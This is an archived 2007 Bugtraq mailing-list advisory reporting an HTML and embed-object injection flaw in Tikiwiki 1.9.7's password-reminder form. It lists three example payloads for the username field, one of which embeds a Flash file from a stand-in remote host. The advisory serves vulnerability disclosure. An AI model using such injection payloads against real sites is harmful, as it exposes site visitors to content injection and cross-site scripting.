Tikiwiki 1.9.7 HTML/embed object injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Tikiwiki 1.9.7 HTML/embed object injection
From: morin.josh@xxxxxxxxx
Date: 24 Aug 2007 06:57:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Tikiwiki 
Version: 1.9.7 

Example Address 
http://example.com/tiki-remind_password.php

Overview:
The following codes can be added to the HTML password page by placing the HTML 
codes in the user name input box and hitting the "send me my password" button. 

Examples:
1.<br><br><b><u>XSS</u></b>
2.<EMBED SRC="http://site.com/xss.swf";
3.<html><fontcolor="Red"><b>Pwned</b></font></html>

Prev by Date: Re: VMWare poor guest isolation design
Next by Date: RE: VMWare poor guest isolation design
Previous by thread: The Korean Hacking & Security Conference "POC 2007" call for papers
Next by thread: 24th Chaos Communication Congress 2007: Call for Participation
Index(es):
- Date
- Thread